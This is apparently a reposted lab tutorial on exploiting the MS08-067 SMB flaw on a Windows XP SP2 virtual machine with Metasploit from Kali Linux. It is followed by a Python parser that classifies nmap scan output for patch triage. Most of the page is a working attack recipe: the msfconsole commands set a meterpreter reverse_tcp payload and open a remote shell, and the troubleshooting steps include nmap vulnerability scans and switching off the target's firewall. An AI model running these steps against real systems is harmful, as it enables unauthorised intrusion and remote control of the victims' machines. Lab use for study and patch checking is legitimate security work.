Attacking WinXP with Metasploit
Source: Internet | Published by: c templates 源码 | Editor: 程序博客网 | Time: 2024/04/25 01:58
This experiment uses the following resources:
Kali Linux image
Windows XP SP2 image
Boot into Kali Linux and start the penetration test:
# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST TARGETIP
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST YOURIP
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.71.105:4445
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 1 opened (192.168.71.105:4445 -> 192.168.71.112:1036) at 2016-01-06 14:06:04 +0800
meterpreter > shell
Process 392 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
That is the whole penetration process. If no meterpreter prompt appears at the end, the exploit did not succeed; in that case work through the following steps:
Check whether the vulnerable port on the target is actually exploitable:
nmap -p 445 --script smb-check-vulns --script-args=unsafe=1 TARGETIP
Output:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT
Nmap scan report for localhost (192.168.71.113)
Host is up (0.00039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BE:48:2C (VMware)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: ERROR: Server returned NT_STATUS_PIPE_NOT_AVAILABLE too many times; giving up.
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
The output contains no "MS08-067: VULNERABLE" line, so this host cannot be exploited. Note that this experiment relies on the MS08-067 vulnerability, which Windows XP SP2 does have.
Switch to the XP SP2 machine and scan again:
nmap -p 445 --script smb-check-vulns --script-args=unsafe=1 TARGETIP
Output:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:00 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
If the port state is "filtered", a firewall is blocking it. In that case turn off the target's firewall and scan again:
Output:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:04 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 6.11 seconds
The vulnerability is now exploitable, so the penetration steps above can be followed.
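As an added example (not part of the original post), the triage that the three scans above walk through by hand, written as a small Python parser over nmap smb-check-vulns text output: it reports whether 445/tcp is filtered by a firewall, and whether the host is flagged "MS08-067: VULNERABLE" and therefore still needs the patch. The sample reports are constructed from the page's own output; real nmap output uses wider column spacing, which the regexes tolerate.

```python
import re

# Constructed scanner output modelled on the three scans shown above; the
# 192.168.71.x addresses are the page's own lab values, not real hosts.
SCAN_OTHER_HOST = """Nmap scan report for localhost (192.168.71.113)
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-check-vulns:
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
"""
SCAN_FIREWALLED = """Nmap scan report for localhost (192.168.71.112)
PORT STATE SERVICE
445/tcp filtered microsoft-ds
"""
SCAN_VULNERABLE = """Nmap scan report for localhost (192.168.71.112)
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?(\d+(?:\.\d+){3})\)?", re.M)
PORT_RE = re.compile(r"^445/tcp\s+(\S+)\s+microsoft-ds", re.M)
MS08_RE = re.compile(r"^\|_?\s*MS08-067:\s*(.+?)\s*$", re.M)

def _first(rx, text, default):
    """Return the first capture group of rx in text, or default if absent."""
    m = rx.search(text)
    return m.group(1) if m else default

def triage_smb_check_vulns(report: str) -> dict:
    """Classify one host's MS08-067 exposure from nmap smb-check-vulns text."""
    state = _first(PORT_RE, report, "unknown")
    ms08 = _first(MS08_RE, report, "NOT REPORTED")
    if state == "filtered":
        verdict = "FIREWALLED"      # 445/tcp dropped by a firewall: inconclusive
    elif state != "open":
        verdict = "NO_SMB"          # port closed or not present in the report
    elif ms08.startswith("VULNERABLE"):
        verdict = "PATCH_REQUIRED"  # unpatched Server service (MS08-067)
    else:
        verdict = "NOT_VULNERABLE"  # SMB reachable, check did not flag MS08-067
    return {"host": _first(HOST_RE, report, "unknown"),
            "port_state": state, "ms08_067": ms08, "verdict": verdict}
```

Running the three constructed reports through triage_smb_check_vulns reproduces the page's conclusions: NOT_VULNERABLE for the first host, FIREWALLED for the second scan, PATCH_REQUIRED once the firewall is off.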